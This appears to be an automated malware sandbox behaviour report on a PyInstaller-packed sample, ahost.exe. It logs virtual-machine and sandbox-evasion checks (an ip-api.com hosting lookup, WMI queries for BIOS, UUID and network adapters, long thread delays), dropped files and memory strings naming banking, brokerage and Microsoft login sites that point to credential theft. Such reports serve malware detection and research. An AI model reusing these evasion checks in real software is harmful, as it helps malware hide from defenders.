Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6692	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 965	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6941
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 821
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6894
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2663
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1445
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5203
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1458
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3495
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2495
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3796
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1531
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3441
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 399
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3360
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 537

Source: C:\Users\user\Desktop\ahost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72722\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\ahost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72722\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\ahost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72722\python313.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ahost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72722\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\ahost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72722\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\ahost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72722\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\ahost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72722\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\ahost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72722\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\ahost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72722\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\ahost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72722\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\ahost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72722\_hashlib.pyd	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ahost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI72722\_ctypes.pyd	Jump to dropped file

Source: C:\Users\user\Desktop\ahost.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_0-17438

Source: C:\Users\user\Desktop\ahost.exe

API coverage: 9.6 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860	Thread sleep count: 6692 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7964	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860	Thread sleep count: 965 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7920	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856	Thread sleep count: 6941 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7868	Thread sleep count: 821 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7960	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7904	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8152	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1692	Thread sleep count: 6894 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1616	Thread sleep count: 2663 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1556	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8036	Thread sleep count: 1445 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8156	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8112	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 916	Thread sleep count: 5203 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5452	Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 916	Thread sleep count: 1458 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6224	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7460	Thread sleep count: 3495 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7460	Thread sleep count: 2495 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8036	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7664	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4904	Thread sleep count: 3796 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5544	Thread sleep count: 1531 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6896	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7264	Thread sleep count: 3441 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7264	Thread sleep count: 399 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5388	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2508	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 316	Thread sleep count: 3360 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 316	Thread sleep count: 537 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2984	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3352	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Windows\System32\attrib.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F91E92F0 FindFirstFileExW,FindClose,	0_2_00007FF7F91E92F0
Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F91E83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00007FF7F91E83B0
Source: C:\Users\user\Desktop\ahost.exe	Code function: 0_2_00007FF7F92018E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF7F92018E4
Source: C:\Users\user\Desktop\ahost.exe	Code function: 2_2_00007FF7F91E92F0 FindFirstFileExW,FindClose,	2_2_00007FF7F91E92F0
Source: C:\Users\user\Desktop\ahost.exe	Code function: 2_2_00007FF7F91E83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	2_2_00007FF7F91E83B0
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8A46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	104_2_00007FF7CF8A46EC
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF8E88E0 FindFirstFileExA,	104_2_00007FF7CF8E88E0
Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	Code function: 104_2_00007FF7CF89E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,	104_2_00007FF7CF89E21C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: getmac.exe, 00000050.00000002.1620437806.0000015C237F3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.1618251992.0000015C237F3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.1618251992.0000015C237CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V
Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696497155
Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vboxservice
Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: getmac.exe, 00000050.00000002.1620437806.0000015C237F3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.1618251992.0000015C237F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: "SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage"
Source: ahost.exe, 00000002.00000003.1579668380.000002162BE02000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1619630084.000002162BE11000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1869730521.000002162BE11000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.2645547592.0000021787458000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000002.1620437806.0000015C237F3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.1618251992.0000015C237F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmsrvc
Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: decodeqemu-ga
Source: getmac.exe, 00000050.00000002.1620437806.0000015C237F3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.1618251992.0000015C237F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAW!
Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: qemu-ga
Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmware
Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: /f15vmsrvc
Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmusrvc
Source: ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmware)
Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696497155f
Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwareservice
Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: getmac.exe, 00000050.00000002.1620437806.0000015C237CF000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.1618251992.0000015C237CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ssubkeyname"system\currentcontrolset\services\hyper-v\linkage"tta
Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwareuser
Source: getmac.exe, 00000050.00000003.1618251992.0000015C237CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwaretray
Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: ahost.exe, 00000002.00000003.1618434399.000002162D061000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1600677108.000002162CF9E000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1632068064.000002162D05C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1618001204.000002162CF9D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1603827636.000002162CDB4000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1866944008.000002162CDB4000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1642271166.000002162D061000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1873852301.000002162D05C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1866135475.000002162D05C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1634120545.000002162CF9C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
